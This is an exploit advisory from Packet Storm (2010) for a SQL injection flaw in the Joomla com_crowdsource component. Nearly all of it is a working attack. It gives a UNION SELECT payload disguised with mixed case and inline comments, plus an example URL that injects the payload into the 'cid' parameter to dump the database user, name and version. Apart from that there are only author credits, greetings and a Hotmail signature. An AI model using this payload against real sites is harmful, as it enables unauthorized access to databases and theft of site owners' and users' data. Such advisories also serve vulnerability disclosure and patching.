Joomla Crowdsource SQL Injection

2010-05-19T00:00:00
ID PACKETSTORM:89639
Type packetstorm
Reporter ByEge
Modified 2010-05-19T00:00:00

Description

                                        
                                            `  
  
  
[!] Title: Joomla Component com_crowdsource SQL Injection   
  
[!] Date: 16.05.2010  
  
[!] Author: ByEge  
  
[!] Homepage: byege.blogspot.com  
  
[+]########################################################################################################################################################[+]  
  
  
[!] ExploiT :  
  
-3/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--  
  
[!] Example :  
  
http://localhost.free/index.php?option=com_crowdsource&view=design&cid=-3/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(char(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--  
  
  
[+]########################################################################################################################################################[+]  
  
[!] Th4nks : Fantastik, MitolocyA, ISYAN,   
  
  
_________________________________________________________________  
Hotmail: Güçlü İSTENMEYEN POSTA koruması ile güvenilir e-posta.  
https://signup.live.com/signup.aspx?id=60969  
  
  
`